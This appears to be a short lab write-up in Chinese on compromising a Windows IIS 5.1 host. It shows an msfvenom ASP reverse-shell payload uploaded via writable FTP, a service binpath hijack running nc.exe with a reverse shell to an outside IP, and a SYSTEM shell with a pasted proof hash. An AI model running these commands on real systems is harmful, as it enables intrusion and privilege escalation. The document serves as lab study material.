PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 80/tcp open http Microsoft IIS httpd 5.1 |_http-server-header: Microsoft-IIS/5.1 | vulners: | cpe:/a:microsoft:iis:5.1: | CVE-2008-1446 9.0 https://vulners.com/cve/CVE-2008-1446 |_ CVE-2009-1535 7.6 https://vulners.com/cve/CVE-2009-1535 3389/tcp open tcpwrapped

存在漏洞: FTP未合理设置上传权限,可以上传木马至网页根目录

利用msfvenom生成asp木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.80 LPORT=4444 -f asp > 1.asp

得到低权限反弹shell之后使用accesschk来检查各个文件及服务有没有misconfigration

accesschk.exe /accepteula -uwcqv IWAM_BOB *

发现SSDPSRV和upnphost这两个服务存在误配置

命令行修改SSDPSRV所运行的.exe文件为我们想要运行的文件

  • sc config SSDPSRV binpath= “c:\inetpub\wwwroot\nc.exe -nv 10.11.0.222 9090 -e cmd.exe”
  • sc config SSDPSRV obj= “.\LocalSystem” password= “”
  • sc config SSDPSRV start= “demand” //mmp没文章要说加这个命令,查了google上某国人文章才知道,原来的服务是被disable的!!!妈的我居然忽略了报错信息!!! 3小时—RIP
  • net start SSDPSRV

SYSTEM shell get√

proof.txt a26f37da4583ff68f44d133d12ae3459

参考:http://fuzzysecurity.com/tutorials/16.html